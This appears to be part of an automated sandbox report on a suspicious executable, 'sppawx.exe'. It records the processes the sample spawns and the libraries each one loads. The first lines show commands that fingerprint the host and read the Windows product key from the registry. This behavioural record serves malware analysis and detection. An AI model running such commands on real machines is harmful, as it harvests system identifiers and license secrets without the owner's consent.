Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
